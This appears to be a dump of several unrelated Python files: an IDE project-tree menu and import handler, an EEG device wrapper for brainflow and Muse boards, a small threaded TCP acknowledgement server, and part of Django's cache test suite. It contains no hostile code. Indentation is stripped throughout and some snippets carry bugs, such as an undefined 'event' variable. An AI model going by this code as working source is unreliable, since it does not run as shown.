def GetCommonItemsMenu(self,menu,menu_item_ids,is_folder=False):
for item_id in menu_item_ids:
if item_id == None:
menu.add_separator()
continue
menu_item = GetApp().Menubar.FindItemById(item_id)
if menu_item is None:
continue
handler = GetApp().Menubar.GetMenuhandler(_("&Project"),item_id)
extra = {}
#更改编辑菜单的tester命令
if item_id in [consts.ID_UNDO,consts.ID_REDO]:
extra.update(dict(tester=lambda:False))
elif item_id in [consts.ID_CLEAR,consts.ID_SELECTALL]:
extra.update(dict(tester=None))
elif item_id == consts.ID_PASTE:
extra.update(dict(tester=self.GetView().CanPaste))
elif item_id in [consts.ID_CUT,consts.ID_COPY]:
if is_folder:
extra.update(dict(tester=lambda:False))
else:
extra.update(dict(tester=None))
if handler == None:
def common_handler(id=item_id):
self.ProcessEvent(id)
handler = common_handler
menu.AppendMenuItem(menu_item,handler=handler,**extra)
def ProcessEvent(self, id):
view = self.GetView()
if id == constants.ID_ADD_FILES_TO_PROJECT:
view.OnAddFileToProject()
return True
elif id == constants.ID_ADD_DIR_FILES_TO_PROJECT:
view.OnAddDirToProject()
return True
elif id == constants.ID_ADD_CURRENT_FILE_TO_PROJECT:
view.OnAddCurrentFileToProject()
return True
elif id == constants.ID_ADD_NEW_FILE:
view.OnAddNewFile()
return True
elif id == constants.ID_ADD_FOLDER:
view.OnAddFolder()
return True
elif id == constants.ID_RENAME:
view.OnRename()
return True
elif id == constants.ID_CLEAR:
view.DeleteFromProject()
return True
elif id == constants.ID_DELETE_PROJECT:
self.OnDeleteProject(event)
return True
elif id == constants.ID_CUT:
view.OnCut()
return True
elif id == constants.ID_COPY:
view.OnCopy()
return True
elif id == constants.ID_PASTE:
view.OnPaste()
return True
elif id == constants.ID_REMOVE_FROM_PROJECT:
view.RemoveFromProject()
return True
elif id == constants.ID_SELECTALL:
self.OnSelectAll(event)
return True
elif id == constants.ID_OPEN_SELECTION:
self.OpenSelection()
return True
elif id == constants.ID_OPEN_SELECTION_WITH:
self.OpenSelectionWith()
return True
elif id == constants.ID_PROPERTIES:
self.OnProperties()
return True
elif id == constants.ID_IMPORT_FILES:
view.ImportFilesToProject()
return True
elif id == constants.ID_OPEN_FOLDER_PATH:
self.OpenFolderPath()
return True
elif id == constants.ID_OPEN_TERMINAL_PATH:
self.OpenPromptPath()
return True
elif id == constants.ID_COPY_PATH:
self.CopyPath()
return True
elif id == constants.ID_REFRESH_FOLDER:
self.Refresh()
else:
return False
def Refresh(self):
item = self.tree.GetSingleSelectItem()
filePath = self.GetItemPath(item)
self.RefreshPath(filePath)
def RefreshPath(self,path):
'''
刷新文件夹添加新文件
'''
add_count = 0
doc = self.GetCurrentProject()
item = self.tree.GetSingleSelectItem()
folderPath = self.GetView()._GetItemFolderPath(item)
try:
#扫描文件夹下的新文件
for l in os.listdir(path):
file_path = os.path.join(path,l)
if fileutils.is_file_path_hidden(file_path):
continue
if os.path.isfile(file_path) and strutils.get_file_extension(l) in self.filters:
if not doc.GetModel().FindFile(file_path):
add_count += 1
doc.GetCommandProcessor().Submit(projectcommand.ProjectAddFilesCommand(doc, [file_path], folderPath=folderPath))
elif os.path.isdir(file_path):
if folderPath:
child_folderPath = folderPath + "/" + l
else:
child_folderPath = l
folder = self.GetView()._treeCtrl.FindFolder(child_folderPath)
if not folder:
#空文件夹下创建一个虚拟文件,防止空文件夹节点被删除
doc.GetCommandProcessor().Submit(projectcommand.ProjectAddFolderCommand(self.GetView(), doc, child_folderPath))
dummy_file = os.path.join(file_path,consts.DUMMY_NODE_TEXT)
doc.GetCommandProcessor().Submit(projectcommand.ProjectAddFilesCommand(doc,[dummy_file],folderPath=folderPath))
except Exception as e:
messagebox.showerror(GetApp().GetAppName(),str(e))
return
#检查节点文件或文件夹是否存在
for child in self.GetView()._treeCtrl.get_children(item):
item_path = self.GetItemPath(child)
if not os.path.exists(item_path):
self.GetView()._treeCtrl.delete(child)
doc.GetCommandProcessor().Submit(projectcommand.ProjectRemoveFilesCommand(doc, [item_path]))
if 0 == add_count:
messagebox.showinfo(GetApp().GetAppName(),_("there is not files to add"))
else:
messagebox.showinfo(GetApp().GetAppName(),_("total add %d files to project")%add_count)
def OnProperties(self):
projectproperty.PropertiesService().ShowPropertyDialog(self.tree.GetSingleSelectItem())
def OnProjectProperties(self,item_name=None):
projectproperty.PropertiesService().ShowPropertyDialog(self.tree.GetRootItem(),option_name=item_name)
def OpenProjectPath(self):
document = self.GetCurrentProject()
fileutils.safe_open_file_directory(document.GetFilename())
def OpenFolderPath(self):
document = self.GetCurrentProject()
project_path = os.path.dirname(document.GetFilename())
item = self.tree.GetSingleSelectItem()
filePath = self.GetItemPath(item)
fileutils.safe_open_file_directory(filePath)
def OpenPromptPath(self):
item = self.tree.GetSingleSelectItem()
filePath = self.GetItemPath(item)
GetApp().OpenTerminator(filename=filePath)
def CopyPath(self):
document = self.GetCurrentProject()
item = self.tree.GetSingleSelectItem()
filePath = self.GetItemPath(item)
utils.CopyToClipboard(filePath)
def GetItemPath(self,item):
if self.GetView()._IsItemFile(item):
filePath = self.GetView()._GetItemFilePath(item)
else:
document = self.GetCurrentProject()
project_path = os.path.dirname(document.GetFilename())
filePath = fileutils.opj(os.path.join(project_path,self.GetView()._GetItemFolderPath(item)))
return filePath
def StartCopyFilesToProject(self,progress_ui,file_list,src_path,dest_path,que,is_wizard=False):
self.copy_thread = threading.Thread(target = self.CopyFilesToProject,args=(progress_ui,file_list,src_path,dest_path,que,is_wizard))
self.copy_thread.start()
def BuildFileList(self,file_list):
return file_list
def CopyFilesToProject(self,progress_ui,file_list,src_path,dest_path,que,is_wizard):
#构建路径对应文件列表的对照表
utils.get_logger().info('start import total %d files to path %s',len(file_list),dest_path)
start_time = time.time()
files_dict = self.BuildFileMaps(file_list)
copy_file_count = 0
#按照路径分别来拷贝文件
for dir_path in files_dict:
self.tree.item(self.tree.GetRootItem(), open=True)
if progress_ui.is_cancel:
break
#路径下所有拷贝的文件列表
file_path_list = files_dict[dir_path]
self.BuildFileList(file_path_list)
#导入文件的相对路径
folder_path = dir_path.replace(src_path,"").replace(os.sep,"/").lstrip("/").rstrip("/")
paths = dest_path.split(os.sep)
#目录路径如果有多层则导入文件的相对路径需添加多层目录
if len(paths) > 1:
#第一层目录为项目目录必须剔除
dest_folder_path = "/".join(paths[1:])
if folder_path != "":
dest_folder_path += "/" + folder_path
else:
dest_folder_path = folder_path
self.GetView().GetDocument().GetCommandProcessor().Submit(ProjectAddProgressFilesCommand(progress_ui,\
self.GetView().GetDocument(), file_path_list, que,folderPath=dest_folder_path,range_value = copy_file_count))
copy_file_count += len(file_path_list)
que.put((None,None))
end_time = time.time()
utils.get_logger().info('success import total %d files,elapse %d seconds',copy_file_count,int(end_time-start_time))
#导入完成后设置启动文件
if is_wizard:
progress_ui.SetStartupfile()
def BuildFileMaps(self,file_list):
d = {}
for file_path in file_list:
dir_path = os.path.dirname(file_path)
if not dir_path in d:
d[dir_path] = [file_path]
else:
d[dir_path].append(file_path)
return d
def SaveProjectConfig(self):
return self.GetView().WriteProjectConfig()
def GetOpenProjects(self):
return self.GetView().Documents
def GetReferenceProjects(self,doc_or_path,ensure_open=False):
if isinstance(doc_or_path,str):
doc = GetApp().GetDocumentManager().GetDocument(doc_or_path)
if doc is None:
return []
else:
doc = doc_or_path
ref_project_names = utils.profile_get(doc.GetKey() + "/ReferenceProjects",[])
if not ensure_open or not ref_project_names:
return ref_project_names
ref_docs = []
for pj_doc in self.GetView().Documents:
if pj_doc.GetFilename() in ref_project_names:
ref_docs.append(pj_doc)
return ref_docs
|
eeg.py | """ Abstraction for the various supported EEG devices.
1. Determine which backend to use for the board.
2.
"""
import os, sys
import time
from time import sleep
from multiprocessing import Process
import numpy as np
import pandas as pd
from brainflow import BoardShim, BoardIds, BrainFlowInputParams
from muselsl import stream, list_muses, record
from pylsl import StreamInfo, StreamOutlet
from eegnb.devices.utils import get_openbci_usb, create_stim_array
# list of brainflow devices
brainflow_devices = [
"ganglion",
"ganglion_wifi",
"cyton",
"cyton_wifi",
"cyton_daisy",
"cyton_daisy_wifi",
"brainbit",
"unicorn",
"synthetic",
"brainbit",
"notion1",
"notion2",
"freeeeg32",
]
class EEG:
device_name: str
def __init__(
self,
device=None,
serial_port=None,
serial_num=None,
mac_addr=None,
other=None,
ip_addr=None,
):
"""The initialization function takes the name of the EEG device and determines whether or not
the device belongs to the Muse or Brainflow families and initializes the appropriate backend.
Parameters:
device (str): name of eeg device used for reading data.
"""
# determine if board uses brainflow or muselsl backend
self.device_name = device
self.serial_num = serial_num
self.serial_port = serial_port
self.mac_address = mac_addr
self.ip_addr = ip_addr
self.other = other
self.backend = self._get_backend(self.device_name)
self.initialize_backend()
def initialize_backend(self):
if self.backend == "brainflow":
self._init_brainflow()
elif self.backend == "muselsl":
self._init_muselsl()
def _get_backend(self, device_name):
if device_name in brainflow_devices:
return "brainflow"
elif device_name in ["muse2016", "muse2", "museS"]:
return "muselsl"
#####################
# MUSE functions #
#####################
def _init_muselsl(self):
# Currently there's nothing we need to do here. However keeping the
# option open to add things with this init method.
pass
def _start_muse(self, duration):
if sys.platform in ["linux", "linux2", "darwin"]:
# Look for muses
self.muses = list_muses()
# self.muse = muses[0]
# Start streaming process
self.stream_process = Process(
target=stream, args=(self.muses[0]["address"],)
)
self.stream_process.start()
# Create markers stream outlet
self.muse_StreamInfo = StreamInfo(
"Markers", "Markers", 1, 0, "int32", "myuidw43536"
)
self.muse_StreamOutlet = StreamOutlet(self.muse_StreamInfo)
# Start a background process that will stream data from the first available Muse
print("starting background recording process")
print("will save to file: %s" % self.save_fn)
self.recording = Process(target=record, args=(duration, self.save_fn))
self.recording.start()
time.sleep(5)
self.push_sample([99], timestamp=time.time())
def _stop_muse(self):
pass
def _muse_push_sample(self, marker, timestamp):
self.muse_StreamOutlet.push_sample(marker, timestamp)
##########################
# BrainFlow functions #
##########################
def _init_brainflow(self):
"""This function initializes the brainflow backend based on the input device name. It calls
a utility function to determine the appropriate USB port to use based on the current operating system.
Additionally, the system allows for passing a serial number in the case that they want to use either
the BraintBit or the Unicorn EEG devices from the brainflow family.
Parameters:
serial_num (str or int): serial number for either the BrainBit or Unicorn devices.
"""
# Initialize brainflow parameters
self.brainflow_params = BrainFlowInputParams()
if self.device_name == "ganglion":
self.brainflow_id = BoardIds.GANGLION_BOARD.value
if self.serial_port == None:
self.brainflow_params.serial_port = get_openbci_usb()
# set mac address parameter in case
if self.mac_address is None:
print("No MAC address provided, attempting to connect without one")
else:
self.brainflow_params.mac_address = self.mac_address
elif self.device_name == "ganglion_wifi":
self.brainflow_id = BoardIds.GANGLION_WIFI_BOARD.value
if self.ip_addr is not None:
self.brainflow_params.ip_address = self.ip_addr
self.brainflow_params.ip_port = 6677
elif self.device_name == "cyton":
self.brainflow_id = BoardIds.CYTON_BOARD.value
if self.serial_port is None:
self.brainflow_params.serial_port = get_openbci_usb()
elif self.device_name == "cyton_wifi":
self.brainflow_id = BoardIds.CYTON_WIFI_BOARD.value
if self.ip_addr is not None:
self.brainflow_params.ip_address = self.ip_addr
self.brainflow_params.ip_port = 6677
elif self.device_name == "cyton_daisy":
self.brainflow_id = BoardIds.CYTON_DAISY_BOARD.value
if self.serial_port is None:
self.brainflow_params.serial_port = get_openbci_usb()
elif self.device_name == "cyton_daisy_wifi":
self.brainflow_id = BoardIds.CYTON_DAISY_WIFI_BOARD.value
if self.ip_addr is not None:
self.brainflow_params.ip_address = self.ip_addr
elif self.device_name == "brainbit":
self.brainflow_id = BoardIds.BRAINBIT_BOARD.value
elif self.device_name == "unicorn":
self.brainflow_id = BoardIds.UNICORN_BOARD.value
elif self.device_name == "callibri_eeg":
self.brainflow_id = BoardIds.CALLIBRI_EEG_BOARD.value
if self.other:
self.brainflow_params.other_info = str(self.other)
elif self.device_name == "notion1":
self.brainflow_id = BoardIds.NOTION_1_BOARD.value
elif self.device_name == "notion2":
self.brainflow_id = BoardIds.NOTION_2_BOARD.value
elif self.device_name == "freeeeg32":
self.brainflow_id = BoardIds.FREEEEG32_BOARD.value
if self.serial_port is None:
self.brainflow_params.serial_port = get_openbci_usb()
elif self.device_name == "synthetic":
self.brainflow_id = BoardIds.SYNTHETIC_BOARD.value
# some devices allow for an optional serial number parameter for better connection
if self.serial_num:
serial_num = str(self.serial_num)
self.brainflow_params.serial_number = serial_num
if self.serial_port:
serial_port = str(self.serial_port)
self.brainflow_params.serial_port = serial_port
# Initialize board_shim
self.sfreq = BoardShim.get_sampling_rate(self.brainflow_id)
self.board = BoardShim(self.brainflow_id, self.brainflow_params)
self.board.prepare_session()
def _start_brainflow(self):
self.board.start_stream()
# wait for signal to settle
sleep(5)
def _stop_brainflow(self):
"""This functions kills the brainflow backend and saves the data to a CSV file."""
# Collect session data and kill session
data = self.board.get_board_data() # will clear board buffer
self.board.stop_stream()
self.board.release_session()
# transform data for saving
data = data.T # transpose data
# get the channel names for EEG data
if (
self.brainflow_id == BoardIds.GANGLION_BOARD.value
or self.brainflow_id == BoardIds.GANGLION_WIFI_BOARD.value
):
# if a ganglion is used, use recommended default EEG channel names
ch_names = ["fp1", "fp2", "tp7", "tp8"]
elif self.brainflow_id == BoardIds.FREEEEG32_BOARD.value:
ch_names = [f"eeg_{i}" for i in range(0, 32)]
else:
# otherwise select eeg channel names via brainflow API
ch_names = BoardShim.get_eeg_names(self.brainflow_id)
# pull EEG channel data via brainflow API
eeg_data = data[:, BoardShim.get_eeg_channels(self.brainflow_id)]
timestamps = data[:, BoardShim.get_timestamp_channel(self.brainflow_id)]
# Create a column for the stimuli to append to the EEG data
stim_array = create_stim_array(timestamps, self.markers)
timestamps = timestamps[
..., None
] # Add an additional dimension so that shapes match
total_data = np.append(timestamps, eeg_data, 1)
total_data = np.append(
total_data, stim_array, 1
) # Append the stim array to data.
# Subtract five seconds of settling time from beginning
total_data = total_data[5 * self.sfreq :]
data_df = pd.DataFrame(total_data, columns=["timestamps"] + ch_names + ["stim"])
data_df.to_csv(self.save_fn, index=False)
def _brainflow_push_sample(self, marker):
last_timestamp = self.board.get_current_board_data(1)[-1][0]
self.markers.append([marker, last_timestamp])
def start(self, fn, duration=None):
"""Starts the EEG device based on the defined backend.
Parameters:
fn (str): name of the file to save the sessions data to.
"""
if fn:
self.save_fn = fn
if self.backend == "brainflow": # Start brainflow backend
self._start_brainflow()
self.markers = []
elif self.backend == "muselsl":
self._start_muse(duration)
def push_sample(self, marker, timestamp):
"""Universal method for pushing a marker and its timestamp to store alongside the EEG data.
Parameters:
marker (int): marker number for the stimuli being presented.
timestamp (float): timestamp of stimulus onset from time.time() function.
"""
if self.backend == "brainflow":
self._brainflow_push_sample(marker=marker)
elif self.backend == "muselsl":
self._muse_push_sample(marker=marker, timestamp=timestamp)
def stop(self):
if self.backend == "brainflow":
self._stop_brainflow()
elif self.backend == "muselsl":
pass
|
TCPServer_2nodes.py | import socket
import threading
import sys
bind_ip = ""
bind_port = 9998
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(8)
print("[*] Listening from %s:%d" % (bind_ip, bind_port))
def handle_client(client_socket):
# send something
client_socket.send("Connected\r\n")
# print out what the client sends
request = client_socket.recv(1024)
print("[*] size of packet (bytes) :", sys.getsizeof(request))
print("[*] Reveived: %s" % request)
# send back a packet
client_socket.send("ACK!\r\n")
client_socket.close()
while True:
client, addr = server.accept()
print("[*] Accepted connection from: %s:%d" % (addr[0], addr[1]))
# spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
|
tests.py | # -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import os
import re
import copy
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core.cache import (cache, caches, CacheKeyWarning,
InvalidCacheBackendError, DEFAULT_CACHE_ALIAS)
from django.db import connection, router, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.template import Template
from django.template.response import TemplateResponse
from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings
from django.test.utils import (IgnoreDeprecationWarningsMixin,
IgnorePendingDeprecationWarningsMixin)
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertEqual(cache.get("key"), None)
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertEqual(result, True)
self.assertEqual(cache.get("addkey1"), None)
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertEqual(cache.get("does_not_exist"), None)
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), None)
cache.delete("key1")
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertEqual(cache.has_key("hello1"), False)
self.assertEqual(cache.has_key("goodbye1"), False)
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertEqual("hello2" in cache, False)
self.assertEqual("goodbye2" in cache, False)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), None)
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(cache.get("expire1"), None)
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), None)
self.assertEqual(cache.has_key("expire3"), False)
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), None)
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = dict((k, base.copy()) for k in _caches_setting_base.keys())
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertEqual(result, False)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertEqual(cache.get("does_not_exist"), None)
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertEqual(cache.has_key("hello1"), True)
self.assertEqual(cache.has_key("goodbye1"), False)
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertEqual("hello2" in cache, True)
self.assertEqual("goodbye2" in cache, False)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(cache.get("expire1"), None)
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertEqual(cache.has_key("expire3"), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', 0)
self.assertEqual(cache.get('key1'), None)
cache.add('key2', 'ham', 0)
self.assertEqual(cache.get('key2'), None)
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertEqual(cache.get('key3'), None)
self.assertEqual(cache.get('key4'), None)
def test_float_timeout(self):
